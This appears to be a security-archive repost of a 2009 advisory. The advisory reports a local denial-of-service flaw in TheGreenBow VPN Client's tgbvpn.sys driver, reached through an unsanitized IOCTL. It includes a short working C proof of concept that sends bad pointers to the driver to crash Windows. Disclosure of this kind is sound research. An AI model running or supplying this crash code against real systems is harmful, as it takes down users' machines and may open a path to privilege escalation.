what you don't know can hurt you

TheGreenBow VPN Denial Of Service

TheGreenBow VPN Denial Of Service
Posted Aug 17, 2009
Authored by Evilcry | Site evilcry.altervista.org

TheGreenBow VPN client versions 4.61.003 suffers from a local denial of service vulnerability in tgbvpn.sys.

tags | exploit, denial of service, local
MD5 | a61e3c21eebf4953ef8187ba6369eb4a

TheGreenBow VPN Denial Of Service

Change Mirror Download
Original Advisory Link: https://www.evilfingers.com/advisory/Advisory/TheGreenBow_VPN_Client_tgbvpn.sys_DoS.php

++++++++++++++++++++++++++++++++++++++++++++++++++++
-----------[TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local
Privilege Escalation]--------->


Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
http://evilcodecave.blogspot.com
http://evilcodecave.wordpress.com
http://evilfingers.com
http://malwareAnalytics.com [under construction]

Release Date: 15/08/2009

+-------------------------------------------------+
Product: TheGreenBow VPN Client 4.61.003 (other versions could be affected)
Affected Component: tgbvpn.sys
Category: Local Denial of Service (BSOD)
(untested) Local Privilege Escalation

+-------------------------------------------------+



--------------------------[Details]--------------->

TheGreenBow's tgbvpn.sys Driver does not sanitize user supplied input
(IOCTL)
and this lead to a Driver Collapse that propagates on the system with a
BSOD,
and potential risk of Privilege Escalation.

Affected IOCTL is 0x80000034

Transfer Type: METHOD_BUFFERED

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
ef1cabf4 841d36a8 ef1cac58 841d36a8 f42dd895 tgbvpn+0x9f51
00000000 00000000 00000000 00000000 00000000 0x841d36a8


+--------------------------------------------------------------------------------------------+
/* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
*
* Author: Giuseppe 'Evilcry' Bonfa'
* E-Mail: evilcry {AT} gmail. {DOT} com
* Website: http://evilcry.netsons.org
* http://evilcodecave.blogspot.com
* http://evilcodecave.wordpress.com
* http://evilfingers.com
* http://malwareAnalytics.com [under construction]
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
HANDLE hDevice;
DWORD Junk;



system("cls");
printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n");

hDevice = CreateFileA("\\\\.\\tgbvpn",
0,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);

if (hDevice == INVALID_HANDLE_VALUE)
{
printf("\n Unable to Device Driver\n");
return EXIT_FAILURE;
}

DeviceIoControl(hDevice, 0x80000034,(LPVOID) 0x80000001, 0, (LPVOID)
0x80000002, 0, &Junk, (LPOVERLAPPED)NULL);


return EXIT_SUCCESS;
}

+--------------------------------------------------------------------------------------------+


Regards,
Giuseppe 'Evilcry' Bonfa'
www.EvilFingers.com

Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close